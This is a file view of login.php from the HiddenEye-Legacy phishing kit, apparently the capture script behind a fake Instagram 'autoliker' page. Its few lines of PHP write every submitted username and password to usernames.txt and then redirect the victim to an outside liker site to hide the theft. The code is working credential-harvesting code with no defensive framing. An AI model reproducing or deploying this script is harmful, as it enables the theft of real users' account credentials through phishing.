HiddenEye-Legacy/WebPages/Instagram_autoliker/login.php
Usama Abdul Sattar 7125203a17
Update login.php
2018-06-07 14:18:07 +05:00

8 lines
221 B
PHP

<?php
include 'base.php';
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://ig-liker.net/');
exit();